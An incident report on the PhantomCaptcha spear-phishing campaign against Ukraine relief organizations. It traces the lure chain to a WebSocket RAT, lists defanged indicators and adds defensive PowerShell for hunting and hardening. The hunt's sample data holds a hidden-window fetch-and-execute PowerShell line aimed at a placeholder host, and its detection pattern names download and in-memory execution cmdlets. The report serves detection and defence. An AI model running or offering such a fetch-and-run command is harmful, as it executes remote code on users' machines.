Full Report
Cybersecurity researchers have disclosed details of a coordinated spear-phishing campaign dubbed PhantomCaptcha targeting organizations associated with Ukraine's war relief efforts to deliver a remote access trojan that uses a WebSocket for command-and-control (C2). The activity, which took place on October 8, 2025, targeted individual members of the International Red Cross, Norwegian Refugee
Analysis Summary
# Incident Report: PhantomCaptcha Spear-Phishing Campaign Against Ukraine Aid Groups
## Executive Summary
A coordinated spear-phishing campaign, dubbed **PhantomCaptcha**, targeted organizations associated with Ukraine's war relief efforts, including the Red Cross and the UNICEF Ukraine office, using PDF lures delivered via emails impersonating the Ukrainian President's Office. The PDF carried a link rather than a document exploit: it led through a fake Zoom site to a fake Cloudflare CAPTCHA page that coaxed the victim into running a PowerShell command (a ClickFix-style lure). That command fetched an obfuscated downloader and, ultimately, a WebSocket-based Remote Access Trojan (RAT) hosted on Russian-owned infrastructure, giving the attackers arbitrary remote command execution on the victim host.
## Incident Details
- Discovery Date: October 22, 2025 (Report published)
- Incident Date: October 8, 2025 (Activity observed)
- Affected Organizations: Individual members of the International Red Cross, Norwegian Refugee Council, UNICEF Ukraine office, Council of Europe's Register of Damage for Ukraine, and Ukrainian regional government administrations.
- Sector: Non-Profit/Aid, Government Support
- Geography: Ukraine (Targeted victims)
## Timeline of Events
### Initial Access
- **Date/Time:** October 8, 2025 (Primary activity day)
- **Vector:** Spear-phishing emails impersonating the Ukrainian President's Office.
- **Details:** Emails contained a booby-trapped PDF document with an embedded link. Clicking the link redirected victims to a fake Zoom site (`zoomconference[.]app`), which led to a fake Cloudflare CAPTCHA page. The page is a ClickFix-style lure: under the guise of "verification" it instructs the user to open the Windows Run dialog and paste a command that silently launches PowerShell, so the execution step is performed by the victim rather than by an exploit.
### Lateral Movement
- **Details:** Not explicitly detailed regarding internal network movement, but the final payload (WebSocket RAT) allows for arbitrary remote command execution, implying capability for further reconnaissance and movement post-infection.
### Data Exfiltration/Impact
- **Details:** The final payload is a WebSocket RAT capable of arbitrary remote command execution and data exfiltration. Furthermore, associated infrastructure targeted Android devices via fake applications on `princess-mens[.]click` to collect geolocation, contacts, call logs, and media files.
### Detection & Response
- **How it was discovered:** Disclosed by SentinelOne researchers on October 22, 2025.
- **Response actions taken:** The report details the analysis and disclosure of the campaign infrastructure and techniques. Specific organizational containment/eradication steps post-compromise were not provided in the summary.
## Attack Methodology
- **Initial Access:** Spear-phishing via weaponized PDF, redirecting to a fake Zoom URL hosting a deceptive CAPTCHA page designed to trick the user into running a malicious PowerShell command.
- **Persistence:** Not described in the report. The RAT holds a long-lived WebSocket session to the C2 server while it runs; no reboot-survival mechanism is documented in the summary.
- **Privilege Escalation:** Not described in the report. The command pasted into the Windows Run dialog runs with the privileges of the logged-in user, and the obfuscated downloader it launches retrieves the subsequent stages in that same context.
- **Defense Evasion:** Obfuscated PowerShell scripts for the downloader and intermediate stages; a final payload that carries C2 over a WebSocket on port 80, which blends with ordinary web traffic and can slip past network monitoring that only inspects conventional HTTP request/response pairs.
- **Credential Access:** Not specified in the report.
- **Discovery:** The second-stage malware performs host reconnaissance and sends findings back to the C2 server.
- **Lateral Movement:** Implied capability via RAT command execution, but specific methodology not detailed.
- **Collection:** Reconnaissance data gathered from the affected host; separate infrastructure targets Android data (geolocation, contacts, media files).
- **Exfiltration:** Data exfiltration capabilities inherent in the WebSocket RAT.
- **Impact:** Arbitrary remote command execution, data theft, and potential deployment of additional malware.
## Impact Assessment
- **Financial:** Not specified.
- **Data Breach:** Sensitive data from targeted aid/relief organizations and potentially private data (contacts, location, media) from compromised Android devices.
- **Operational:** Potential disruption to operations of humanitarian and government support entities in the targeted regions.
- **Reputational:** Potential reputational damage to targeted organizations due to perceived security failure or disruption of critical aid activities.
## Indicators of Compromise
- **Network indicators (Defanged):**
- C2 WebSocket Endpoint: `wss://bsnowcommunications[.]com:80`
- Initial Redirect Domain: `zoomconference[.]app`
- Malware Hosting Domain: `goodhillsenterprise[.]com`
- Android Payload Domain: `princess-mens[.]click`
- **File indicators:** Weaponized 8-page PDF document, Obfuscated PowerShell downloader/scripts.
- **Behavioral indicators:** A shell (`powershell.exe`) spawned by `explorer.exe` with a command line pasted into the Windows Run dialog shortly after browser interaction, which also leaves the pasted command in the user's `RunMRU` registry key; a WebSocket session from a PowerShell process to attacker infrastructure on TCP port 80 (note that `wss://` on port 80 is itself atypical, since TLS WebSockets normally use 443, and the protocol/port mismatch is a useful detection hook); execution of base64-encoded JSON commands via `Invoke-Expression`.
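The behavioral indicators above translate into a small hunt. The following PowerShell is an added example written for this report, not tooling from SentinelOne or from the campaign itself: it reads the `RunMRU` key (where Windows records commands typed into the Run dialog), flags command lines with ClickFix traits, and applies the same logic to Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records. All sample entries and events are constructed, and `example.invalid` / `203.0.113.10` are placeholders, not indicators from the campaign.

```powershell
# Added hunting example for ClickFix-style execution artifacts (not from the report).
# Sample data at the bottom is constructed; the functions also work on live data.

# Traits typical of a pasted one-liner: in-memory execution, encoding, download cmdlets, hidden window.
$script:ClickFixPattern = '(?i)(invoke-expression|\biex\b|-enc\w*\s|frombase64string|downloadstring|invoke-webrequest|invoke-restmethod|\birm\b|\biwr\b|-w(indowstyle)?\s+hidden|mshta|curl\s+)'

function Test-ClickFixCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    return [bool]($CommandLine -match $script:ClickFixPattern)
}

function Get-RunMruEntries {
    # RunMRU values are named a, b, c, ...; each holds "<command>\1". MRUList gives recency order.
    param([string]$Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU')
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    $item  = Get-Item -LiteralPath $Path
    $order = ([string]$item.GetValue('MRUList', '')).ToCharArray()
    foreach ($name in $order) {
        $raw = $item.GetValue([string]$name, $null)
        if ($null -ne $raw) {
            [pscustomobject]@{ Slot = [string]$name; Command = ($raw -replace '\\1$', '') }
        }
    }
}

function Find-SuspiciousRunMru {
    param([Parameter(Mandatory)][object[]]$Entries)
    $Entries | Where-Object { Test-ClickFixCommandLine $_.Command }
}

function Find-ClickFixProcessEvents {
    # Event ID 1 records: a scripting host spawned by explorer.exe (Run dialog / Win+R)
    # whose command line carries ClickFix traits.
    param([Parameter(Mandatory)][object[]]$Events)
    $Events | Where-Object {
        $_.EventId -eq 1 -and
        $_.ParentImage -match '\\explorer\.exe$' -and
        $_.Image -match '\\(powershell|pwsh|cmd|mshta)\.exe$' -and
        (Test-ClickFixCommandLine $_.CommandLine)
    }
}

function Find-ScriptHostPort80Connections {
    # Event ID 3 records: PowerShell talking to TCP/80. The campaign's C2 is a WebSocket on
    # port 80, so a script host opening that port is the network-side hook.
    param([Parameter(Mandatory)][object[]]$Events)
    $Events | Where-Object {
        $_.EventId -eq 3 -and $_.DestinationPort -eq 80 -and
        $_.Image -match '\\(powershell|pwsh)\.exe$'
    }
}

# ---- Constructed sample data (placeholders, not real telemetry or campaign IOCs) ----
$sampleRunMru = @(
    [pscustomobject]@{ Slot = 'a'; Command = 'notepad' },
    [pscustomobject]@{ Slot = 'b'; Command = 'powershell -w hidden -c "iex (irm https://example.invalid/v)"' }
)
$ps = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$sampleEvents = @(
    [pscustomobject]@{ EventId = 1; Image = $ps; ParentImage = 'C:\Windows\explorer.exe';         CommandLine = 'powershell -w hidden -c "iex (irm https://example.invalid/v)"' },
    [pscustomobject]@{ EventId = 1; Image = $ps; ParentImage = 'C:\Windows\System32\svchost.exe'; CommandLine = 'powershell -File C:\Scripts\inventory.ps1' },
    [pscustomobject]@{ EventId = 3; Image = $ps; DestinationIp = '203.0.113.10'; DestinationPort = 80 }
)

Find-SuspiciousRunMru -Entries $sampleRunMru            | Format-Table -AutoSize
Find-ClickFixProcessEvents -Events $sampleEvents        | Format-Table Image, CommandLine -AutoSize
Find-ScriptHostPort80Connections -Events $sampleEvents  | Format-Table Image, DestinationIp, DestinationPort -AutoSize
# On a live host: Find-SuspiciousRunMru -Entries (Get-RunMruEntries)
```

Against the sample data, only the Run-dialog entry in slot `b`, the explorer-spawned PowerShell event and the port-80 connection are reported; the scheduled `svchost.exe`-parented script is ignored. On real telemetry, feed Sysmon events from `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational'` into the same functions; `RunMRU` is per user, so run the registry check under each profile you are investigating.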
## Response Actions
- **Containment measures:** Not detailed in the report. The standard response to this chain is to isolate compromised endpoints and block the listed C2 and staging domains at DNS and egress.
- **Eradication steps:** Full removal of the WebSocket RAT and associated scripts from affected systems.
- **Recovery actions:** Rebuilding or restoring systems, password resets, and confirming cessation of all C2 communication.
## Lessons Learned
- **Key takeaways:** Threat actors are highly focused on disrupting and gathering intelligence on humanitarian efforts related to the Ukraine conflict. Sophisticated, multi-stage social engineering techniques (combining fake meetings, CAPTCHAs, and PowerShell) remain highly effective.
- **What could have been done better:** Organizations handling sensitive international relief coordination require rigorous training against contemporary, highly sophisticated spear-phishing, particularly concerning prompts that trigger direct shell command execution.
## Recommendations
- **Prevention measures for similar incidents:**
1. Implement robust security solutions capable of detecting obfuscated PowerShell execution and unexpected outbound WebSocket traffic.
2. Constrain PowerShell for standard users (AppLocker or WDAC policies that place it in Constrained Language Mode) and, where staff have no need for it, remove the Run dialog via the "Remove Run menu from Start Menu" policy, which also disables Win+R. Note that other ClickFix variants direct victims to the File Explorer address bar or a terminal instead, so this narrows rather than closes the pathway.
3. Tune endpoint detection and response (EDR) to flag a scripting host (`powershell.exe`, `cmd.exe`, `mshta.exe`) spawned by `explorer.exe` shortly after browser activity, and review the per-user `RunMRU` registry key during triage, since commands pasted into the Run dialog are recorded there.
4. Enhance security awareness training to warn staff against external prompts requiring them to paste or run commands retrieved from web pages, even if they appear to mimic trusted services (like CAPTCHAs or Zoom).
5. Implement stricter access controls and multi-factor authentication (MFA) organization-wide.
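The policy side of recommendations 1 to 3 can be applied and verified with the following PowerShell. This is an added example for this report, not guidance taken from SentinelOne or from the affected organizations; the registry locations are the documented Windows policy paths, and the script must run elevated because three of the four writes go to `HKLM`. In an enterprise the same values would normally be delivered by Group Policy rather than a local script.

```powershell
# Added hardening example (not from the report): remove the Run dialog for the current user
# and turn on PowerShell script block and module logging so the de-obfuscated stages are
# recorded. Requires an elevated session for the HKLM writes.

$policies = @(
    # "Remove Run menu from Start Menu": also disables Win+R, breaking the paste-into-Run step.
    @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer';             Name = 'NoRun';                    Value = 1 },
    # Script block logging (Event ID 4104) captures what Invoke-Expression actually executed.
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging';         Name = 'EnableScriptBlockLogging'; Value = 1 },
    # Module logging (Event ID 4103) for all modules records parameter values such as decoded URLs.
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging';              Name = 'EnableModuleLogging';      Value = 1 },
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames';  Name = '*';                        Value = '*' }
)

function Set-ClickFixHardening {
    param([hashtable[]]$Policies = $policies)
    foreach ($p in $Policies) {
        if (-not (Test-Path -LiteralPath $p.Path)) { New-Item -Path $p.Path -Force | Out-Null }
        $type = if ($p.Value -is [int]) { 'DWord' } else { 'String' }
        New-ItemProperty -Path $p.Path -Name $p.Name -Value $p.Value -PropertyType $type -Force | Out-Null
    }
}

function Test-ClickFixHardening {
    # Reads each value back and reports whether it matches the intended setting.
    param([hashtable[]]$Policies = $policies)
    foreach ($p in $Policies) {
        $key    = Get-Item -LiteralPath $p.Path -ErrorAction SilentlyContinue
        $actual = if ($null -ne $key) { $key.GetValue($p.Name, $null) } else { $null }
        [pscustomobject]@{
            Policy   = "$($p.Path)\$($p.Name)"
            Expected = $p.Value
            Actual   = $actual
            Ok       = ($actual -eq $p.Value)
        }
    }
}

Set-ClickFixHardening
Test-ClickFixHardening | Format-Table -AutoSize
```

`NoRun` is a per-user policy, so it must be applied to every profile (or via a user-scope GPO), and users keep other ways to launch a shell; the logging settings are what give the detection logic something to match on when the lure succeeds anyway. Constrained Language Mode is deliberately not set here through the `__PSLockdownPolicy` environment variable, which is unsupported and trivially bypassed; enforce it with an AppLocker or WDAC policy instead.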